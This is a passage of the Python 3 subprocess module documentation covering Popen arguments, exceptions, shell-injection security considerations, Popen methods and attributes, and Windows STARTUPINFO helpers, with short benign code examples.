includes, for example, quoting or backslash escaping filenames with spaces in
them. If <em>args</em> is a sequence, the first item specifies the command string, and
any additional items will be treated as additional arguments to the shell
itself. That is to say, <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> does the equivalent of:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">Popen</span><span class="p">([</span><span class="s">'/bin/sh'</span><span class="p">,</span> <span class="s">'-c'</span><span class="p">,</span> <span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">args</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">...</span><span class="p">])</span>
</pre></div>
</div>
<p>On Windows with <tt class="docutils literal"><span class="pre">shell=True</span></tt>, the <span class="target" id="index-2"></span><tt class="xref std std-envvar docutils literal"><span class="pre">COMSPEC</span></tt> environment variable
specifies the default shell. The only time you need to specify
<tt class="docutils literal"><span class="pre">shell=True</span></tt> on Windows is when the command you wish to execute is built
into the shell (e.g. <strong class="command">dir</strong> or <strong class="command">copy</strong>). You do not need
<tt class="docutils literal"><span class="pre">shell=True</span></tt> to run a batch file or console-based executable.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Read the <a class="reference internal" href="#security-considerations">Security Considerations</a> section before using <tt class="docutils literal"><span class="pre">shell=True</span></tt>.</p>
</div>
<p><em>bufsize</em> will be supplied as the corresponding argument to the
<a class="reference internal" href="functions.html#open" title="open"><tt class="xref py py-func docutils literal"><span class="pre">open()</span></tt></a> function when creating the stdin/stdout/stderr pipe
file objects:</p>
<ul class="simple">
<li><tt class="xref py py-const docutils literal"><span class="pre">0</span></tt> means unbuffered (read and write are one
system call and can return short)</li>
<li><tt class="xref py py-const docutils literal"><span class="pre">1</span></tt> means line buffered
(only usable if <tt class="docutils literal"><span class="pre">universal_newlines=True</span></tt> i.e., in a text mode)</li>
<li>any other positive value means use a buffer of approximately that
size</li>
<li>negative bufsize (the default) means the system default of
io.DEFAULT_BUFFER_SIZE will be used.</li>
</ul>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3.1: </span><em>bufsize</em> now defaults to -1 to enable buffering by default to match the
behavior that most code expects. In versions prior to Python 3.2.4 and
3.3.1 it incorrectly defaulted to <tt class="xref py py-const docutils literal"><span class="pre">0</span></tt> which was unbuffered
and allowed short reads. This was unintentional and did not match the
behavior of Python 2 as most code expected.</p>
</div>
<p>The <em>executable</em> argument specifies a replacement program to execute. It
is very seldom needed. When <tt class="docutils literal"><span class="pre">shell=False</span></tt>, <em>executable</em> replaces the
program to execute specified by <em>args</em>. However, the original <em>args</em> is
still passed to the program. Most programs treat the program specified
by <em>args</em> as the command name, which can then be different from the program
actually executed. On POSIX, the <em>args</em> name
becomes the display name for the executable in utilities such as
<strong class="program">ps</strong>. If <tt class="docutils literal"><span class="pre">shell=True</span></tt>, on POSIX the <em>executable</em> argument
specifies a replacement shell for the default <tt class="file docutils literal"><span class="pre">/bin/sh</span></tt>.</p>
<p><em>stdin</em>, <em>stdout</em> and <em>stderr</em> specify the executed program’s standard input,
standard output and standard error file handles, respectively. Valid values
are <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>, <a class="reference internal" href="#subprocess.DEVNULL" title="subprocess.DEVNULL"><tt class="xref py py-data docutils literal"><span class="pre">DEVNULL</span></tt></a>, an existing file descriptor (a positive
integer), an existing <a class="reference internal" href="../glossary.html#term-file-object"><em class="xref std std-term">file object</em></a>, and <tt class="docutils literal"><span class="pre">None</span></tt>. <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>
indicates that a new pipe to the child should be created. <a class="reference internal" href="#subprocess.DEVNULL" title="subprocess.DEVNULL"><tt class="xref py py-data docutils literal"><span class="pre">DEVNULL</span></tt></a>
indicates that the special file <a class="reference internal" href="os.html#os.devnull" title="os.devnull"><tt class="xref py py-data docutils literal"><span class="pre">os.devnull</span></tt></a> will be used. With the
default settings of <tt class="docutils literal"><span class="pre">None</span></tt>, no redirection will occur; the child’s file
handles will be inherited from the parent. Additionally, <em>stderr</em> can be
<a class="reference internal" href="#subprocess.STDOUT" title="subprocess.STDOUT"><tt class="xref py py-data docutils literal"><span class="pre">STDOUT</span></tt></a>, which indicates that the stderr data from the applications
should be captured into the same file handle as for stdout.</p>
<p>If <em>preexec_fn</em> is set to a callable object, this object will be called in the
child process just before the child is executed.
(POSIX only)</p>
<div class="admonition warning">
<p class="first admonition-title">Warning</p>
<p class="last">The <em>preexec_fn</em> parameter is not safe to use in the presence of threads
in your application. The child process could deadlock before exec is
called.
If you must use it, keep it trivial! Minimize the number of libraries
you call into.</p>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">If you need to modify the environment for the child use the <em>env</em>
parameter rather than doing it in a <em>preexec_fn</em>.
The <em>start_new_session</em> parameter can take the place of a previously
common use of <em>preexec_fn</em> to call os.setsid() in the child.</p>
</div>
<p>If <em>close_fds</em> is true, all file descriptors except <tt class="xref py py-const docutils literal"><span class="pre">0</span></tt>, <tt class="xref py py-const docutils literal"><span class="pre">1</span></tt> and
<tt class="xref py py-const docutils literal"><span class="pre">2</span></tt> will be closed before the child process is executed. (POSIX only).
The default varies by platform: Always true on POSIX. On Windows it is
true when <em>stdin</em>/<em>stdout</em>/<em>stderr</em> are <a class="reference internal" href="constants.html#None" title="None"><tt class="xref py py-const docutils literal"><span class="pre">None</span></tt></a>, false otherwise.
On Windows, if <em>close_fds</em> is true then no handles will be inherited by the
child process. Note that on Windows, you cannot set <em>close_fds</em> to true and
also redirect the standard handles by setting <em>stdin</em>, <em>stdout</em> or <em>stderr</em>.</p>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.2: </span>The default for <em>close_fds</em> was changed from <a class="reference internal" href="constants.html#False" title="False"><tt class="xref py py-const docutils literal"><span class="pre">False</span></tt></a> to
what is described above.</p>
</div>
<p><em>pass_fds</em> is an optional sequence of file descriptors to keep open
between the parent and child. Providing any <em>pass_fds</em> forces
<em>close_fds</em> to be <a class="reference internal" href="constants.html#True" title="True"><tt class="xref py py-const docutils literal"><span class="pre">True</span></tt></a>. (POSIX only)</p>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.2: </span>The <em>pass_fds</em> parameter was added.</p>
</div>
<p>If <em>cwd</em> is not <tt class="docutils literal"><span class="pre">None</span></tt>, the function changes the working directory to
<em>cwd</em> before executing the child. In particular, the function looks for
<em>executable</em> (or for the first item in <em>args</em>) relative to <em>cwd</em> if the
executable path is a relative path.</p>
<p>If <em>restore_signals</em> is true (the default) all signals that Python has set to
SIG_IGN are restored to SIG_DFL in the child process before the exec.
Currently this includes the SIGPIPE, SIGXFZ and SIGXFSZ signals.
(POSIX only)</p>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.2: </span><em>restore_signals</em> was added.</p>
</div>
<p>If <em>start_new_session</em> is true the setsid() system call will be made in the
child process prior to the execution of the subprocess. (POSIX only)</p>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.2: </span><em>start_new_session</em> was added.</p>
</div>
<p>If <em>env</em> is not <tt class="docutils literal"><span class="pre">None</span></tt>, it must be a mapping that defines the environment
variables for the new process; these are used instead of the default
behavior of inheriting the current process’ environment.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">If specified, <em>env</em> must provide any variables required for the program to
execute. On Windows, in order to run a <a class="reference external" href="http://en.wikipedia.org/wiki/Side-by-Side_Assembly">side-by-side assembly</a> the
specified <em>env</em> <strong>must</strong> include a valid <span class="target" id="index-3"></span><tt class="xref std std-envvar docutils literal"><span class="pre">SystemRoot</span></tt>.</p>
</div>
<p>If <em>universal_newlines</em> is <tt class="docutils literal"><span class="pre">True</span></tt>, the file objects <em>stdin</em>, <em>stdout</em>
and <em>stderr</em> are opened as text streams in universal newlines mode, as
described above in <a class="reference internal" href="#frequently-used-arguments"><em>Frequently Used Arguments</em></a>, otherwise they are
opened as binary streams.</p>
<p>If given, <em>startupinfo</em> will be a <a class="reference internal" href="#subprocess.STARTUPINFO" title="subprocess.STARTUPINFO"><tt class="xref py py-class docutils literal"><span class="pre">STARTUPINFO</span></tt></a> object, which is
passed to the underlying <tt class="docutils literal"><span class="pre">CreateProcess</span></tt> function.
<em>creationflags</em>, if given, can be <a class="reference internal" href="#subprocess.CREATE_NEW_CONSOLE" title="subprocess.CREATE_NEW_CONSOLE"><tt class="xref py py-data docutils literal"><span class="pre">CREATE_NEW_CONSOLE</span></tt></a> or
<a class="reference internal" href="#subprocess.CREATE_NEW_PROCESS_GROUP" title="subprocess.CREATE_NEW_PROCESS_GROUP"><tt class="xref py py-data docutils literal"><span class="pre">CREATE_NEW_PROCESS_GROUP</span></tt></a>. (Windows only)</p>
<p>Popen objects are supported as context managers via the <a class="reference internal" href="../reference/compound_stmts.html#with"><tt class="xref std std-keyword docutils literal"><span class="pre">with</span></tt></a> statement:
on exit, standard file descriptors are closed, and the process is waited for.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="k">with</span> <span class="n">Popen</span><span class="p">([</span><span class="s">"ifconfig"</span><span class="p">],</span> <span class="n">stdout</span><span class="o">=</span><span class="n">PIPE</span><span class="p">)</span> <span class="k">as</span> <span class="n">proc</span><span class="p">:</span>
<span class="n">log</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">proc</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">read</span><span class="p">())</span>
</pre></div>
</div>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.2: </span>Added context manager support.</p>
</div>
</dd></dl>
</div>
<div class="section" id="exceptions">
<h3>17.5.1.3. Exceptions<a class="headerlink" href="#exceptions" title="Permalink to this headline">¶</a></h3>
<p>Exceptions raised in the child process, before the new program has started to
execute, will be re-raised in the parent. Additionally, the exception object
will have one extra attribute called <tt class="xref py py-attr docutils literal"><span class="pre">child_traceback</span></tt>, which is a string
containing traceback information from the child’s point of view.</p>
<p>The most common exception raised is <a class="reference internal" href="exceptions.html#OSError" title="OSError"><tt class="xref py py-exc docutils literal"><span class="pre">OSError</span></tt></a>. This occurs, for example,
when trying to execute a non-existent file. Applications should prepare for
<a class="reference internal" href="exceptions.html#OSError" title="OSError"><tt class="xref py py-exc docutils literal"><span class="pre">OSError</span></tt></a> exceptions.</p>
<p>A <a class="reference internal" href="exceptions.html#ValueError" title="ValueError"><tt class="xref py py-exc docutils literal"><span class="pre">ValueError</span></tt></a> will be raised if <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> is called with invalid
arguments.</p>
<p><a class="reference internal" href="#subprocess.check_call" title="subprocess.check_call"><tt class="xref py py-func docutils literal"><span class="pre">check_call()</span></tt></a> and <a class="reference internal" href="#subprocess.check_output" title="subprocess.check_output"><tt class="xref py py-func docutils literal"><span class="pre">check_output()</span></tt></a> will raise
<a class="reference internal" href="#subprocess.CalledProcessError" title="subprocess.CalledProcessError"><tt class="xref py py-exc docutils literal"><span class="pre">CalledProcessError</span></tt></a> if the called process returns a non-zero return
code.</p>
<p>All of the functions and methods that accept a <em>timeout</em> parameter, such as
<a class="reference internal" href="#subprocess.call" title="subprocess.call"><tt class="xref py py-func docutils literal"><span class="pre">call()</span></tt></a> and <a class="reference internal" href="#subprocess.Popen.communicate" title="subprocess.Popen.communicate"><tt class="xref py py-meth docutils literal"><span class="pre">Popen.communicate()</span></tt></a> will raise <a class="reference internal" href="#subprocess.TimeoutExpired" title="subprocess.TimeoutExpired"><tt class="xref py py-exc docutils literal"><span class="pre">TimeoutExpired</span></tt></a> if
the timeout expires before the process exits.</p>
<p>Exceptions defined in this module all inherit from <a class="reference internal" href="#subprocess.SubprocessError" title="subprocess.SubprocessError"><tt class="xref py py-exc docutils literal"><span class="pre">SubprocessError</span></tt></a>.</p>
<blockquote>
<div><div class="versionadded">
<p><span class="versionmodified">New in version 3.3: </span>The <a class="reference internal" href="#subprocess.SubprocessError" title="subprocess.SubprocessError"><tt class="xref py py-exc docutils literal"><span class="pre">SubprocessError</span></tt></a> base class was added.</p>
</div>
</div></blockquote>
</div>
</div>
<div class="section" id="security-considerations">
<h2>17.5.2. Security Considerations<a class="headerlink" href="#security-considerations" title="Permalink to this headline">¶</a></h2>
<p>Unlike some other popen functions, this implementation will never
implicitly call a system shell. This means that all characters,
including shell metacharacters, can safely be passed to child processes.
If the shell is invoked explicitly, via <tt class="docutils literal"><span class="pre">shell=True</span></tt>, it is the application’s
responsibility to ensure that all whitespace and metacharacters are
quoted appropriately to avoid
<a class="reference external" href="http://en.wikipedia.org/wiki/Shell_injection#Shell_injection">shell injection</a>
vulnerabilities.</p>
<p>When using <tt class="docutils literal"><span class="pre">shell=True</span></tt>, the <a class="reference internal" href="shlex.html#shlex.quote" title="shlex.quote"><tt class="xref py py-func docutils literal"><span class="pre">shlex.quote()</span></tt></a> function can be
used to properly escape whitespace and shell metacharacters in strings
that are going to be used to construct shell commands.</p>
</div>
<div class="section" id="popen-objects">
<h2>17.5.3. Popen Objects<a class="headerlink" href="#popen-objects" title="Permalink to this headline">¶</a></h2>
<p>Instances of the <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> class have the following methods:</p>
<dl class="method">
<dt id="subprocess.Popen.poll">
<tt class="descclassname">Popen.</tt><tt class="descname">poll</tt><big>(</big><big>)</big><a class="headerlink" href="#subprocess.Popen.poll" title="Permalink to this definition">¶</a></dt>
<dd><p>Check if child process has terminated. Set and return
<a class="reference internal" href="#subprocess.Popen.returncode" title="subprocess.Popen.returncode"><tt class="xref py py-attr docutils literal"><span class="pre">returncode</span></tt></a> attribute.</p>
</dd></dl>
<dl class="method">
<dt id="subprocess.Popen.wait">
<tt class="descclassname">Popen.</tt><tt class="descname">wait</tt><big>(</big><em>timeout=None</em><big>)</big><a class="headerlink" href="#subprocess.Popen.wait" title="Permalink to this definition">¶</a></dt>
<dd><p>Wait for child process to terminate. Set and return
<a class="reference internal" href="#subprocess.Popen.returncode" title="subprocess.Popen.returncode"><tt class="xref py py-attr docutils literal"><span class="pre">returncode</span></tt></a> attribute.</p>
<p>If the process does not terminate after <em>timeout</em> seconds, raise a
<a class="reference internal" href="#subprocess.TimeoutExpired" title="subprocess.TimeoutExpired"><tt class="xref py py-exc docutils literal"><span class="pre">TimeoutExpired</span></tt></a> exception. It is safe to catch this exception and
retry the wait.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">This will deadlock when using <tt class="docutils literal"><span class="pre">stdout=PIPE</span></tt> or <tt class="docutils literal"><span class="pre">stderr=PIPE</span></tt>
and the child process generates enough output to a pipe such that
it blocks waiting for the OS pipe buffer to accept more data.
Use <a class="reference internal" href="#subprocess.Popen.communicate" title="subprocess.Popen.communicate"><tt class="xref py py-meth docutils literal"><span class="pre">Popen.communicate()</span></tt></a> when using pipes to avoid that.</p>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">The function is implemented using a busy loop (non-blocking call and
short sleeps). Use the <a class="reference internal" href="asyncio.html#module-asyncio" title="asyncio: Asynchronous I/O, event loop, coroutines and tasks."><tt class="xref py py-mod docutils literal"><span class="pre">asyncio</span></tt></a> module for an asynchronous wait:
see <a class="reference internal" href="asyncio-subprocess.html#asyncio.create_subprocess_exec" title="asyncio.create_subprocess_exec"><tt class="xref py py-class docutils literal"><span class="pre">asyncio.create_subprocess_exec</span></tt></a>.</p>
</div>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3: </span><em>timeout</em> was added.</p>
</div>
<div class="deprecated">
<p><span class="versionmodified">Deprecated since version 3.4: </span>Do not use the <em>endtime</em> parameter. It is was unintentionally
exposed in 3.3 but was left undocumented as it was intended to be
private for internal use. Use <em>timeout</em> instead.</p>
</div>
</dd></dl>
<dl class="method">
<dt id="subprocess.Popen.communicate">
<tt class="descclassname">Popen.</tt><tt class="descname">communicate</tt><big>(</big><em>input=None</em>, <em>timeout=None</em><big>)</big><a class="headerlink" href="#subprocess.Popen.communicate" title="Permalink to this definition">¶</a></dt>
<dd><p>Interact with process: Send data to stdin. Read data from stdout and stderr,
until end-of-file is reached. Wait for process to terminate. The optional
<em>input</em> argument should be data to be sent to the child process, or
<tt class="docutils literal"><span class="pre">None</span></tt>, if no data should be sent to the child. The type of <em>input</em>
must be bytes or, if <em>universal_newlines</em> was <tt class="docutils literal"><span class="pre">True</span></tt>, a string.</p>
<p><a class="reference internal" href="#subprocess.Popen.communicate" title="subprocess.Popen.communicate"><tt class="xref py py-meth docutils literal"><span class="pre">communicate()</span></tt></a> returns a tuple <tt class="docutils literal"><span class="pre">(stdout_data,</span> <span class="pre">stderr_data)</span></tt>.</p>
<p>Note that if you want to send data to the process’s stdin, you need to create
the Popen object with <tt class="docutils literal"><span class="pre">stdin=PIPE</span></tt>. Similarly, to get anything other than
<tt class="docutils literal"><span class="pre">None</span></tt> in the result tuple, you need to give <tt class="docutils literal"><span class="pre">stdout=PIPE</span></tt> and/or
<tt class="docutils literal"><span class="pre">stderr=PIPE</span></tt> too.</p>
<p>If the process does not terminate after <em>timeout</em> seconds, a
<a class="reference internal" href="#subprocess.TimeoutExpired" title="subprocess.TimeoutExpired"><tt class="xref py py-exc docutils literal"><span class="pre">TimeoutExpired</span></tt></a> exception will be raised. Catching this exception and
retrying communication will not lose any output.</p>
<p>The child process is not killed if the timeout expires, so in order to
cleanup properly a well-behaved application should kill the child process and
finish communication:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">proc</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">Popen</span><span class="p">(</span><span class="o">...</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">outs</span><span class="p">,</span> <span class="n">errs</span> <span class="o">=</span> <span class="n">proc</span><span class="o">.</span><span class="n">communicate</span><span class="p">(</span><span class="n">timeout</span><span class="o">=</span><span class="mi">15</span><span class="p">)</span>
<span class="k">except</span> <span class="n">TimeoutExpired</span><span class="p">:</span>
<span class="n">proc</span><span class="o">.</span><span class="n">kill</span><span class="p">()</span>
<span class="n">outs</span><span class="p">,</span> <span class="n">errs</span> <span class="o">=</span> <span class="n">proc</span><span class="o">.</span><span class="n">communicate</span><span class="p">()</span>
</pre></div>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">The data read is buffered in memory, so do not use this method if the data
size is large or unlimited.</p>
</div>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3: </span><em>timeout</em> was added.</p>
</div>
</dd></dl>
<dl class="method">
<dt id="subprocess.Popen.send_signal">
<tt class="descclassname">Popen.</tt><tt class="descname">send_signal</tt><big>(</big><em>signal</em><big>)</big><a class="headerlink" href="#subprocess.Popen.send_signal" title="Permalink to this definition">¶</a></dt>
<dd><p>Sends the signal <em>signal</em> to the child.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">On Windows, SIGTERM is an alias for <a class="reference internal" href="#subprocess.Popen.terminate" title="subprocess.Popen.terminate"><tt class="xref py py-meth docutils literal"><span class="pre">terminate()</span></tt></a>. CTRL_C_EVENT and
CTRL_BREAK_EVENT can be sent to processes started with a <em>creationflags</em>
parameter which includes <cite>CREATE_NEW_PROCESS_GROUP</cite>.</p>
</div>
</dd></dl>
<dl class="method">
<dt id="subprocess.Popen.terminate">
<tt class="descclassname">Popen.</tt><tt class="descname">terminate</tt><big>(</big><big>)</big><a class="headerlink" href="#subprocess.Popen.terminate" title="Permalink to this definition">¶</a></dt>
<dd><p>Stop the child. On Posix OSs the method sends SIGTERM to the
child. On Windows the Win32 API function <tt class="xref c c-func docutils literal"><span class="pre">TerminateProcess()</span></tt> is called
to stop the child.</p>
</dd></dl>
<dl class="method">
<dt id="subprocess.Popen.kill">
<tt class="descclassname">Popen.</tt><tt class="descname">kill</tt><big>(</big><big>)</big><a class="headerlink" href="#subprocess.Popen.kill" title="Permalink to this definition">¶</a></dt>
<dd><p>Kills the child. On Posix OSs the function sends SIGKILL to the child.
On Windows <a class="reference internal" href="#subprocess.Popen.kill" title="subprocess.Popen.kill"><tt class="xref py py-meth docutils literal"><span class="pre">kill()</span></tt></a> is an alias for <a class="reference internal" href="#subprocess.Popen.terminate" title="subprocess.Popen.terminate"><tt class="xref py py-meth docutils literal"><span class="pre">terminate()</span></tt></a>.</p>
</dd></dl>
<p>The following attributes are also available:</p>
<dl class="attribute">
<dt id="subprocess.Popen.args">
<tt class="descclassname">Popen.</tt><tt class="descname">args</tt><a class="headerlink" href="#subprocess.Popen.args" title="Permalink to this definition">¶</a></dt>
<dd><p>The <em>args</em> argument as it was passed to <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> – a
sequence of program arguments or else a single string.</p>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.3.</span></p>
</div>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.Popen.stdin">
<tt class="descclassname">Popen.</tt><tt class="descname">stdin</tt><a class="headerlink" href="#subprocess.Popen.stdin" title="Permalink to this definition">¶</a></dt>
<dd><p>If the <em>stdin</em> argument was <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>, this attribute is a writeable
stream object as returned by <a class="reference internal" href="functions.html#open" title="open"><tt class="xref py py-func docutils literal"><span class="pre">open()</span></tt></a>. If the <em>universal_newlines</em>
argument was <tt class="docutils literal"><span class="pre">True</span></tt>, the stream is a text stream, otherwise it is a byte
stream. If the <em>stdin</em> argument was not <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>, this attribute is
<tt class="docutils literal"><span class="pre">None</span></tt>.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.Popen.stdout">
<tt class="descclassname">Popen.</tt><tt class="descname">stdout</tt><a class="headerlink" href="#subprocess.Popen.stdout" title="Permalink to this definition">¶</a></dt>
<dd><p>If the <em>stdout</em> argument was <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>, this attribute is a readable
stream object as returned by <a class="reference internal" href="functions.html#open" title="open"><tt class="xref py py-func docutils literal"><span class="pre">open()</span></tt></a>. Reading from the stream provides
output from the child process. If the <em>universal_newlines</em> argument was
<tt class="docutils literal"><span class="pre">True</span></tt>, the stream is a text stream, otherwise it is a byte stream. If the
<em>stdout</em> argument was not <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>, this attribute is <tt class="docutils literal"><span class="pre">None</span></tt>.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.Popen.stderr">
<tt class="descclassname">Popen.</tt><tt class="descname">stderr</tt><a class="headerlink" href="#subprocess.Popen.stderr" title="Permalink to this definition">¶</a></dt>
<dd><p>If the <em>stderr</em> argument was <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>, this attribute is a readable
stream object as returned by <a class="reference internal" href="functions.html#open" title="open"><tt class="xref py py-func docutils literal"><span class="pre">open()</span></tt></a>. Reading from the stream provides
error output from the child process. If the <em>universal_newlines</em> argument was
<tt class="docutils literal"><span class="pre">True</span></tt>, the stream is a text stream, otherwise it is a byte stream. If the
<em>stderr</em> argument was not <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>, this attribute is <tt class="docutils literal"><span class="pre">None</span></tt>.</p>
</dd></dl>
<div class="admonition warning">
<p class="first admonition-title">Warning</p>
<p class="last">Use <a class="reference internal" href="#subprocess.Popen.communicate" title="subprocess.Popen.communicate"><tt class="xref py py-meth docutils literal"><span class="pre">communicate()</span></tt></a> rather than <a class="reference internal" href="#subprocess.Popen.stdin" title="subprocess.Popen.stdin"><tt class="xref py py-attr docutils literal"><span class="pre">.stdin.write</span></tt></a>,
<a class="reference internal" href="#subprocess.Popen.stdout" title="subprocess.Popen.stdout"><tt class="xref py py-attr docutils literal"><span class="pre">.stdout.read</span></tt></a> or <a class="reference internal" href="#subprocess.Popen.stderr" title="subprocess.Popen.stderr"><tt class="xref py py-attr docutils literal"><span class="pre">.stderr.read</span></tt></a> to avoid
deadlocks due to any of the other OS pipe buffers filling up and blocking the
child process.</p>
</div>
<dl class="attribute">
<dt id="subprocess.Popen.pid">
<tt class="descclassname">Popen.</tt><tt class="descname">pid</tt><a class="headerlink" href="#subprocess.Popen.pid" title="Permalink to this definition">¶</a></dt>
<dd><p>The process ID of the child process.</p>
<p>Note that if you set the <em>shell</em> argument to <tt class="docutils literal"><span class="pre">True</span></tt>, this is the process ID
of the spawned shell.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.Popen.returncode">
<tt class="descclassname">Popen.</tt><tt class="descname">returncode</tt><a class="headerlink" href="#subprocess.Popen.returncode" title="Permalink to this definition">¶</a></dt>
<dd><p>The child return code, set by <a class="reference internal" href="#subprocess.Popen.poll" title="subprocess.Popen.poll"><tt class="xref py py-meth docutils literal"><span class="pre">poll()</span></tt></a> and <a class="reference internal" href="#subprocess.Popen.wait" title="subprocess.Popen.wait"><tt class="xref py py-meth docutils literal"><span class="pre">wait()</span></tt></a> (and indirectly
by <a class="reference internal" href="#subprocess.Popen.communicate" title="subprocess.Popen.communicate"><tt class="xref py py-meth docutils literal"><span class="pre">communicate()</span></tt></a>). A <tt class="docutils literal"><span class="pre">None</span></tt> value indicates that the process
hasn’t terminated yet.</p>
<p>A negative value <tt class="docutils literal"><span class="pre">-N</span></tt> indicates that the child was terminated by signal
<tt class="docutils literal"><span class="pre">N</span></tt> (POSIX only).</p>
</dd></dl>
</div>
<div class="section" id="windows-popen-helpers">
<h2>17.5.4. Windows Popen Helpers<a class="headerlink" href="#windows-popen-helpers" title="Permalink to this headline">¶</a></h2>
<p>The <a class="reference internal" href="#subprocess.STARTUPINFO" title="subprocess.STARTUPINFO"><tt class="xref py py-class docutils literal"><span class="pre">STARTUPINFO</span></tt></a> class and following constants are only available
on Windows.</p>
<dl class="class">
<dt id="subprocess.STARTUPINFO">
<em class="property">class </em><tt class="descclassname">subprocess.</tt><tt class="descname">STARTUPINFO</tt><a class="headerlink" href="#subprocess.STARTUPINFO" title="Permalink to this definition">¶</a></dt>
<dd><p>Partial support of the Windows
<a class="reference external" href="http://msdn.microsoft.com/en-us/library/ms686331(v=vs.85).aspx">STARTUPINFO</a>
structure is used for <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> creation.</p>
<dl class="attribute">
<dt id="subprocess.STARTUPINFO.dwFlags">
<tt class="descname">dwFlags</tt><a class="headerlink" href="#subprocess.STARTUPINFO.dwFlags" title="Permalink to this definition">¶</a></dt>
<dd><p>A bit field that determines whether certain <a class="reference internal" href="#subprocess.STARTUPINFO" title="subprocess.STARTUPINFO"><tt class="xref py py-class docutils literal"><span class="pre">STARTUPINFO</span></tt></a>
attributes are used when the process creates a window.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">si</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">STARTUPINFO</span><span class="p">()</span>
<span class="n">si</span><span class="o">.</span><span class="n">dwFlags</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">STARTF_USESTDHANDLES</span> <span class="o">|</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">STARTF_USESHOWWINDOW</span>
</pre></div>
</div>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.STARTUPINFO.hStdInput">
<tt class="descname">hStdInput</tt><a class="headerlink" href="#subprocess.STARTUPINFO.hStdInput" title="Permalink to this definition">¶</a></dt>
<dd><p>If <a class="reference internal" href="#subprocess.STARTUPINFO.dwFlags" title="subprocess.STARTUPINFO.dwFlags"><tt class="xref py py-attr docutils literal"><span class="pre">dwFlags</span></tt></a> specifies <a class="reference internal" href="#subprocess.STARTF_USESTDHANDLES" title="subprocess.STARTF_USESTDHANDLES"><tt class="xref py py-data docutils literal"><span class="pre">STARTF_USESTDHANDLES</span></tt></a>, this attribute
is the standard input handle for the process. If
<a class="reference internal" href="#subprocess.STARTF_USESTDHANDLES" title="subprocess.STARTF_USESTDHANDLES"><tt class="xref py py-data docutils literal"><span class="pre">STARTF_USESTDHANDLES</span></tt></a> is not specified, the default for standard
input is the keyboard buffer.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.STARTUPINFO.hStdOutput">
<tt class="descname">hStdOutput</tt><a class="headerlink" href="#subprocess.STARTUPINFO.hStdOutput" title="Permalink to this definition">¶</a></dt>
<dd><p>If <a class="reference internal" href="#subprocess.STARTUPINFO.dwFlags" title="subprocess.STARTUPINFO.dwFlags"><tt class="xref py py-attr docutils literal"><span class="pre">dwFlags</span></tt></a> specifies <a class="reference internal" href="#subprocess.STARTF_USESTDHANDLES" title="subprocess.STARTF_USESTDHANDLES"><tt class="xref py py-data docutils literal"><span class="pre">STARTF_USESTDHANDLES</span></tt></a>, this attribute
is the standard output handle for the process. Otherwise, this attribute
is ignored and the default for standard output is the console window’s
buffer.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.STARTUPINFO.hStdError">
